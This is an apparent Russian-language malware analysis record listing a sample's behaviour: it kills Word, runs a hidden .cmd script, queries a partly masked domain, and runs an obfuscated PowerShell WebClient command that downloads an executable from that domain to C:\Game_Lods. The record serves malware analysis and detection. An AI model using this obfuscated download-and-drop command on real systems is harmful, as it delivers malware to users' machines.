Техническая информация
- '<SYSTEM32>\taskkill.exe' /IM "winword.exe" /F
- C:\game_lods\groters.cmd
- C:\game_lods\netrikos.exe
- http://an###style.com/ram2base.php
- http://an###style.com/cgi-sys/suspendedpage.cgi
- DNS ASK an###style.com
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c ""C:\Game_Lods\Groters.cmd" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""C:\Game_Lods\Groters.cmd" "
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://an###style.com/ram2base.php', 'C:\Game_Lods\Netrikos.exe')